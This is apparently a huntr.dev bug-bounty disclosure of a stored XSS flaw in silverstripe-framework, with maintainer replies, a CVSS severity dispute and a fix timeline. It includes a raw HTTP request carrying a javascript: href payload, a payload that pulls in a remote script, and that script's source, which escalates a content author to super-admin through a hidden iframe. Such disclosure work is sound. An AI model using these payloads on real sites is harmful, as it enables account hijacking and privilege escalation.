Stored xss bug to hijack admin account in silverstripe/silverstripe-framework

Valid

Reported on

Mar 27th 2022


Description

Using this xss lower level user can change his role to super-admin and can hijack admin account

Proof of Concept

1. First from super-admin account goto http://localhost/silverstripe/admin/security/#Root_Users and add user-B as content authors .
also give user-B only permisssion to page section .
2. Now from user-B account goto any page and edit it http://localhost/silverstripe/admin/pages/edit/show/7.
after edit save it and bellow request is sent to server

POST /silverstripe/admin/pages/edit/EditForm/7/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Pjax: CurrentForm,Breadcrumbs
X-Requested-With: XMLHttpRequest
Content-Length: 1967
Origin: http://localhost
Connection: close
Referer: http://localhost/silverstripe/admin/pages/edit/show/7
Cookie: 

Title=admin-pageNew+Page&URLSegment=admin-pagenew-page&MenuTitle=admin-pageNew+Page&Content=%3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:alert(document.domain)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E&MetaDescription=&ExtraMeta=&ClassName=Page&ParentID=0&SecurityID=5aa9e58c341853a9f4b5320d938debaf514a8b50&ID=7&AbsoluteLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F&LiveLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DLive&StageLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DStage&ArchiveWarningMessage=Warning%3A+This+page+and+all+of+its+child+pages+will+be+unpublished+before+being+sent+to+the+archive.%5Cn%5CnAre+you+sure+you+want+to+proceed%3F&TreeTitle=%3Cspan+class%3D%22jstree-pageicon+page-icon+font-icon-page+class-Page%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22item%22+data-allowedchildren%3D%22%5B%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-page%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CErrorPage%5C%5CErrorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BError+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-error%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CRedirectorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BRedirector+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-redirect%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CVirtualPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BVirtual+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-virtual%26quot%3B%7D%5D%22%3Eadmin-pageNew+Page%3C%2Fspan%3E&Action=split&action_save=1&BackURL=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin%2Fpages%2Fedit%2Fshow%2F7

here in this request put xss payload %3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:alert(document.domain)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E& in Content parameter .
If you decode this then you get <p><a title="jhkh" href="javascript:alert(document.domain)">sd</a></p>
here javascript code javascript:alert(document.domain) is provided .

3. Now goto admin account and open the above page http://localhost/silverstripe/admin-pagenew-page?stage=Stage and click the link in this page and see xss is executed

EXPLOIT

  • tested browser is chrome in linux .
    *Admin is loggen in into his account \
  • silverstripe installation at http://localhost/silverstripe

Lets attacker is user-B and he want to change his role from "Content authors" to super-admin using this xsss.
So, user-B now use bellow xss payload in above Content parameter

%3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:var+a=document.createElement('script');a.src='http://localhost/silver.js';document.body.appendChild(a)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E

if you decode this payload then you get

<p><a title="jhkh" href="javascript:var a=document.createElement('script');a.src='http://localhost/silver.js';document.body.appendChild(a)">sd</a></p>

flow

1. user-B(attacker) provided above xss payload in page content .
2. admin open the page and click the link then javascript code will be executed .
3. a new javascript will be downloaded from http://localhost/silver.js and it will execute .
5. now malicious javascript code will send a post request to POST /silverstripe/admin/pages/edit/EditForm/1/ to chnage user-B(attacker) role super-admin from "content authors".
now user-B become super-admin

content of malicious javascript

function prepareFrame() {
        var ifrm = document.createElement("iframe");
        ifrm.setAttribute("src", "http://localhost/silverstripe/admin/security/EditForm/field/Members/item/2/edit"); //attacker load form into hidden iframe  to change the role
        ifrm.style.width = "0";
        ifrm.style.height = "0";
        ifrm.setAttribute("id","hack");
        document.body.appendChild(ifrm);
    }
    prepareFrame();
 myTimeout = setTimeout(fireing, 6000);

function fireing() {

        document.getElementById("hack").contentWindow.document.getElementById("Form_ItemEditForm_DirectGroups").value=2; //change group to super-admin
        document.getElementById("hack").contentWindow.document.getElementById("Form_ItemEditForm_action_doSave").click(); //submit the form

}


VIDEO POC

https://drive.google.com/file/d/1BXa-h79YgaF4hSdHyOd2kiyBn16rO9Xv/view?usp=sharing

Impact

Using this xsss "content author" can execute any javascript code in admin account . So, "Content authors" can change his role to super-admin using this xss

We are processing your report and will contact the silverstripe/silverstripe-framework team within 24 hours. 5 months ago
ranjit-git modified the report
5 months ago
We have contacted a member of the silverstripe/silverstripe-framework team and are waiting to hear back 4 months ago
We have sent a follow up to the silverstripe/silverstripe-framework team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the silverstripe/silverstripe-framework team. We will try again in 10 days. 4 months ago
4 months ago

Maintainer


Thanks, we replicated this issue at our end. It's a general issue where javascript: in href attributes are not removed server side

Could you please confirm if you'd liked to be acknowledged in the official disclosure? Would crediting you as follows be OK?

ranjit-git via huntr.dev

Regards Steve Boyd Silverstripe Product Developer

ranjit-git
4 months ago

Researcher


Yes, ok for me to get acknowledged

Jamie Slome
4 months ago

Admin


@maintainer - is this ready to be marked as valid and fixed?

4 months ago

Maintainer


It is a valid issue.

It is not fixed though, and we do not have an ETA yet.

Regards Steve Boyd Silverstripe Product Developer

Jamie Slome
4 months ago

Admin


@maintainer - thanks for the heads up 👍

You can go ahead and mark it as valid using the drop-down below when you are ready. A CVE will not be assigned and the report will remain private.

Only once the fix has been confirmed against the report will it go public :)

silverstripe/silverstripe-framework maintainer modified the report
4 months ago
silverstripe/silverstripe-framework maintainer modified the report
4 months ago
silverstripe/silverstripe-framework maintainer validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
ranjit-git
4 months ago

Researcher


@maintainer i have shown you how attacker can become super-admin using this xsss bug and then lower level user can perform any activity as super-admin. i have escalated to maximum severity here .I think severity should be high . here is cvss score https://ibb.co/n69gDmZ https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H&version=3.1 can you plz tell me how you calculated cvsss score?

ranjit-git
4 months ago

Researcher



    Attack-vector --> Network 
    Attack-complexcity --> Low
    Privileges Required  --> Low --> low level privileged requeired
    User Interaction --> Required --> because user has to click attacker payload
    Scope-->Changed  --> because scope is changed to super-admin from lower level user
    Confidentiality Impact  --> High --> because attacker get all confidentiality of information 
    Integrity Impact --> High  --> because attacker can perform any activity as super-admin
    Availability Impact --> High --> because all information is available to attacker 

ranjit-git
4 months ago

Researcher


@admin can you look into the cvss score here ? I could have submit this report with just as "xss bug" nothing fancy more and this will easily fall under medium severity . But huntr now look for severity based report and based on that bounty is calculated . So, i escalated it to maximum impact that attacker can perform . using this bug attacker escalated himself to super-admin and fully hijack the account of existing super-admin . After become super-admin attacker has full control over the dashboard .

Adam Nygate
4 months ago

Admin


Hi Ranjit, given the report content, the maintainer has defined the severity of this security issue. We (huntr) don't influence the severity of reports as the maintainers know their project best.

ranjit-git
4 months ago

Researcher


@admin Then there is no need to severity based report. Why the extra work to show the severity of bug if it does not considered.

ranjit-git
4 months ago

Researcher


Hijacking the admin account only severity stand to 5.4

Adam Nygate
4 months ago

Admin


Hi Ranjit. Let's please stay on topic. If you have no other questions regarding this specific report, then let's take the conversation offline so as to not spam this channel.

We have sent a fix follow up to the silverstripe/silverstripe-framework team. We will try again in 7 days. 4 months ago
We have sent a second fix follow up to the silverstripe/silverstripe-framework team. We will try again in 10 days. 4 months ago
We have sent a third and final fix follow up to the silverstripe/silverstripe-framework team. This report is now considered stale. 3 months ago
silverstripe/silverstripe-framework maintainer confirmed that a fix has been merged on d2c58f 2 months ago
The fix bounty has been dropped
to join this conversation